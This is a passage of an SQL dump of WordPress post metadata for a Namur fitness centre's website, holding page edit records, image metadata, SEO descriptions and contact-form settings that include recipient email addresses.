(704, 255, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881541:1\";}\";'),
(705, 255, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(706, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(707, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881549:1\";}\";'),
(708, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(709, 256, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(710, 256, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881641:1\";}\";'),
(711, 256, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1496, 131, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(715, 257, '_form', '<p>Votre nom (obligatoire)<br />\n    [text* your-name] </p>\n\n<p>Votre email (obligatoire)<br />\n    [email* your-email] </p>\n\n<p>Sujet<br />\n    [text your-subject] </p>\n\n<p>Votre message<br />\n    [textarea your-message] </p>\n\n[captchac captcha-712]\n<p>Veuillez recopier les caractères ci-dessus<br />\n[captchar captcha-712]</p>\n\n<p>[submit \"Send\"]</p>'),
(716, 257, '_mail', 'a:7:{s:7:\"subject\";s:14:\"[your-subject]\";s:6:\"sender\";s:26:\"[your-name] <[your-email]>\";s:4:\"body\";s:192:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n--\nThis e-mail was sent from a contact form on Cross Training Center (http://www.crosstrainingcenter.be)\";s:9:\"recipient\";s:25:\"juliepierrard@hotmail.com\";s:18:\"additional_headers\";s:0:\"\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;}'),
(717, 257, '_mail_2', 'a:8:{s:6:\"active\";b:0;s:7:\"subject\";s:14:\"[your-subject]\";s:6:\"sender\";s:26:\"[your-name] <[your-email]>\";s:4:\"body\";s:192:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n--\nThis e-mail was sent from a contact form on Cross Training Center (http://www.crosstrainingcenter.be)\";s:9:\"recipient\";s:12:\"stv@otvr.net\";s:18:\"additional_headers\";s:0:\"\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;}'),
(718, 257, '_messages', 'a:21:{s:12:\"mail_sent_ok\";s:43:\"Your message was sent successfully. Thanks.\";s:12:\"mail_sent_ng\";s:93:\"Failed to send your message. Please try later or contact the administrator by another method.\";s:16:\"validation_error\";s:74:\"Validation errors occurred. Please confirm the fields and submit it again.\";s:4:\"spam\";s:93:\"Failed to send your message. Please try later or contact the administrator by another method.\";s:12:\"accept_terms\";s:35:\"Please accept the terms to proceed.\";s:16:\"invalid_required\";s:31:\"Please fill the required field.\";s:17:\"captcha_not_match\";s:31:\"Your entered code is incorrect.\";s:14:\"invalid_number\";s:28:\"Number format seems invalid.\";s:16:\"number_too_small\";s:25:\"This number is too small.\";s:16:\"number_too_large\";s:25:\"This number is too large.\";s:13:\"invalid_email\";s:28:\"Email address seems invalid.\";s:11:\"invalid_url\";s:18:\"URL seems invalid.\";s:11:\"invalid_tel\";s:31:\"Telephone number seems invalid.\";s:13:\"upload_failed\";s:22:\"Failed to upload file.\";s:24:\"upload_file_type_invalid\";s:30:\"This file type is not allowed.\";s:21:\"upload_file_too_large\";s:23:\"This file is too large.\";s:23:\"upload_failed_php_error\";s:38:\"Failed to upload file. Error occurred.\";s:23:\"quiz_answer_not_correct\";s:27:\"Your answer is not correct.\";s:12:\"invalid_date\";s:26:\"Date format seems invalid.\";s:14:\"date_too_early\";s:23:\"This date is too early.\";s:13:\"date_too_late\";s:22:\"This date is too late.\";}'),
(719, 257, '_additional_settings', ''),
(720, 258, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(721, 258, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883153:1\";}\";'),
(722, 258, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(723, 259, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(724, 259, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883297:1\";}\";'),
(725, 259, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(726, 142, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(727, 142, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883379:1\";}\";'),
(728, 142, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(729, 142, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(730, 142, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883440:1\";}\";'),
(731, 142, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(732, 260, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(733, 260, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883500:1\";}\";'),
(734, 260, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(735, 261, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(736, 261, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883575:1\";}\";'),
(737, 261, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(738, 142, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(739, 142, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883610:1\";}\";'),
(740, 142, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(741, 142, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(742, 142, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883672:1\";}\";'),
(743, 142, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(744, 262, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(745, 262, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883732:1\";}\";'),
(746, 262, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(747, 142, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(748, 142, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883785:1\";}\";'),
(749, 142, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(750, 263, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(751, 263, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883846:1\";}\";'),
(752, 263, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(753, 264, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(754, 264, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883852:1\";}\";');
INSERT INTO `www2_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(755, 264, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(756, 265, '_form', '<p>Votre nom (obligatoire)<br />\n    [text* your-name] <br>\nVotre prénom (obligatoire)<br />\n    [text* your-firstname] <br>\nVotre email (obligatoire)<br />\n    [email* your-email] <br>\nVotre n° de téléphone (obligatoire)<br />\n    [text* your-tel]<br>\n[captchac captcha-696]<br>\nVeuillez recopier les caractères ci-dessus<br />\n    [captchar captcha-696] </p>\n\n<p>[submit \"Contactez moi pour un RDV Séance Booster\"]</p>'),
(979, 317, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(757, 265, '_mail', 'a:7:{s:7:\"subject\";s:24:\"Demande séance gratuite\";s:6:\"sender\";s:26:\"[your-name] <[your-email]>\";s:4:\"body\";s:255:\"De : [your-name] <[your-email]>\nSujet : Demande séance gratuite\n\nDemande de séance gratuite :\n[your-name]\n[your-firstname]\n[your-email]\n[your-tel]\n\n\n--\nThis e-mail was sent from a contact form on Cross Training Center (http://www.crosstrainingcenter.be)\";s:9:\"recipient\";s:25:\"juliepierrard@hotmail.com\";s:18:\"additional_headers\";s:0:\"\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;}'),
(758, 265, '_mail_2', 'a:8:{s:6:\"active\";b:1;s:7:\"subject\";s:24:\"Demande séance gratuite\";s:6:\"sender\";s:26:\"[your-name] <[your-email]>\";s:4:\"body\";s:255:\"De : [your-name] <[your-email]>\nSujet : Demande séance gratuite\n\nDemande de séance gratuite :\n[your-name]\n[your-firstname]\n[your-email]\n[your-tel]\n\n\n--\nThis e-mail was sent from a contact form on Cross Training Center (http://www.crosstrainingcenter.be)\";s:9:\"recipient\";s:12:\"stv@otvr.net\";s:18:\"additional_headers\";s:0:\"\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;}'),
(759, 265, '_messages', 'a:21:{s:12:\"mail_sent_ok\";s:42:\"Votre message a bien été envoyé. Merci.\";s:12:\"mail_sent_ng\";s:116:\"Erreur lors de l\'envoi du message. Veuillez réessayer plus tard ou contacter l\'administrateur d\'une autre manière.\";s:16:\"validation_error\";s:76:\"Erreur de validation. Veuillez vérifier les champs et soumettre à nouveau.\";s:4:\"spam\";s:116:\"Erreur lors de l\'envoi du message. Veuillez réessayer plus tard ou contacter l\'administrateur d\'une autre manière.\";s:12:\"accept_terms\";s:61:\"Merci de bien vouloir accepter les conditions pour continuer.\";s:16:\"invalid_required\";s:38:\"Veuillez remplir le champ obligatoire.\";s:17:\"captcha_not_match\";s:28:\"Le code entre est incorrect.\";s:14:\"invalid_number\";s:37:\"Le format numérique semble invalide.\";s:16:\"number_too_small\";s:25:\"Ce nombre est trop petit.\";s:16:\"number_too_large\";s:25:\"Ce nombre est trop grand.\";s:13:\"invalid_email\";s:32:\"L\'adresse email semble invalide.\";s:11:\"invalid_url\";s:22:\"L\'URL semble invalide.\";s:11:\"invalid_tel\";s:42:\"Le numéro de téléphone semble invalide.\";s:13:\"upload_failed\";s:39:\"Impossible de télécharger le fichier.\";s:24:\"upload_file_type_invalid\";s:39:\"Ce type de fichier n\'est pas autorisé.\";s:21:\"upload_file_too_large\";s:31:\"Ce fichier est trop volumineux.\";s:23:\"upload_failed_php_error\";s:64:\"Impossible de télécharger le fichier. Une erreur est survenue.\";s:23:\"quiz_answer_not_correct\";s:30:\"Votre réponse est incorrecte.\";s:12:\"invalid_date\";s:34:\"Le format de date semble invalide.\";s:14:\"date_too_early\";s:25:\"Cette date est trop tôt.\";s:13:\"date_too_late\";s:25:\"Cette date est trop tard.\";}'),
(760, 265, '_additional_settings', ''),
(761, 266, '_edit_last', '1'),
(762, 266, '_wp_page_template', 'default'),
(763, 266, '_edit_lock', '1409471491:1'),
(764, 267, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(765, 267, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(766, 267, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372884222:1\";}\";'),
(767, 268, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(768, 268, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883821:1\";}\";'),
(769, 268, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(770, 269, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(771, 269, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881523:1\";}\";'),
(772, 269, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(773, 270, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(774, 270, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1371390907:1\";}\";'),
(775, 270, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(776, 271, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(777, 271, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883262:1\";}\";'),
(778, 271, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(779, 272, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(780, 272, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1371391117:1\";}\";'),
(781, 272, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(782, 273, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(783, 273, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878623:1\";}\";'),
(784, 273, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(785, 274, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(786, 274, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(787, 274, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372884279:1\";}\";'),
(788, 275, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(789, 275, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(790, 275, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372884313:1\";}\";'),
(791, 275, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(792, 275, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(793, 275, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372884374:1\";}\";'),
(794, 276, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(795, 276, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(796, 276, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372884434:1\";}\";'),
(797, 277, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(798, 277, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(799, 277, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372884494:1\";}\";'),
(800, 278, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(801, 278, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372885467:1\";}\";'),
(802, 278, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1495, 131, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(806, 279, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(807, 279, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372955014:1\";}\";'),
(808, 279, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1494, 131, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1493, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1492, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383771581:1\";}\";'),
(1491, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1490, 131, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1489, 131, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(818, 280, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(819, 280, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372955219:1\";}\";'),
(820, 280, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(821, 281, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(822, 281, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372955305:1\";}\";'),
(823, 281, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(824, 282, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(825, 282, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372955328:1\";}\";'),
(826, 282, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(827, 283, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(828, 283, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372955511:1\";}\";'),
(829, 283, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(830, 284, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(831, 284, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372955611:1\";}\";'),
(832, 284, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(833, 285, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(834, 285, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372955657:1\";}\";'),
(835, 285, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(836, 286, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(837, 286, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372961920:1\";}\";'),
(838, 286, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(839, 287, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(840, 287, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372961944:1\";}\";'),
(841, 287, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(842, 288, '_wp_attached_file', '2013/07/illu1.png'),
(843, 288, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:271;s:6:\"height\";i:197;s:4:\"file\";s:17:\"2013/07/illu1.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"illu1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(844, 289, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(845, 289, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372963855:1\";}\";'),
(846, 289, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(847, 290, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(848, 290, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372963904:1\";}\";'),
(849, 290, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(850, 291, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(851, 291, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372963931:1\";}\";'),
(852, 291, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(853, 292, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(854, 292, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372963949:1\";}\";'),
(855, 292, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1576, 397, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1384464421:1\";}\";'),
(1575, 397, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(859, 293, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(860, 293, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372964426:1\";}\";'),
(861, 293, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(862, 294, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(863, 294, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372964444:1\";}\";'),
(864, 294, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1574, 387, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1573, 387, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(868, 295, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(869, 295, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372964533:1\";}\";'),
(870, 295, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1572, 387, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1384464405:1\";}\";'),
(1571, 387, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(874, 296, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(875, 296, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372964640:1\";}\";'),
(876, 296, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1570, 396, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1569, 396, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(880, 297, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(881, 297, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372964860:1\";}\";'),
(882, 297, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1568, 396, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1384464208:1\";}\";'),
(1567, 396, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1566, 387, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1565, 387, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1564, 387, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1384464178:1\";}\";'),
(889, 298, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(890, 298, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372964987:1\";}\";'),
(891, 298, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(892, 299, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(893, 299, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965039:1\";}\";'),
(894, 299, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(895, 300, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(896, 300, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965074:1\";}\";'),
(897, 300, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1563, 387, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1562, 395, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(901, 301, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(902, 301, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965175:1\";}\";'),
(903, 301, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1561, 395, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1560, 395, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1384464046:1\";}\";'),
(907, 302, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(908, 302, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965271:1\";}\";'),
(909, 302, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(910, 303, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(911, 303, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965299:1\";}\";'),
(912, 303, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(913, 304, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(914, 304, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965350:1\";}\";'),
(915, 304, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(916, 305, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(917, 305, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965366:1\";}\";'),
(918, 305, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(919, 306, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(920, 306, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965384:1\";}\";'),
(921, 306, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(922, 307, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(923, 307, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965406:1\";}\";'),
(924, 307, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(925, 308, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(926, 308, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965428:1\";}\";'),
(927, 308, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(928, 309, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(929, 309, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965446:1\";}\";'),
(930, 309, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(931, 310, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(932, 310, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965459:1\";}\";'),
(933, 310, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1558, 393, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1557, 393, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(940, 311, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(941, 311, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965656:1\";}\";'),
(942, 311, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1556, 393, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1555, 393, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1554, 393, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383772570:1\";}\";'),
(1553, 393, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1336, 358, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(949, 312, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(950, 312, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965838:1\";}\";'),
(951, 312, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(952, 313, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(953, 313, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965874:1\";}\";'),
(954, 313, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(955, 314, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(956, 314, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965906:1\";}\";'),
(957, 314, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(958, 275, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(959, 275, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(960, 275, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372966054:1\";}\";'),
(961, 275, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(962, 275, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(963, 275, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372966116:1\";}\";'),
(964, 275, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(965, 275, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(966, 275, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372966176:1\";}\";'),
(967, 275, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(968, 275, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(969, 275, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372966237:1\";}\";'),
(970, 275, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
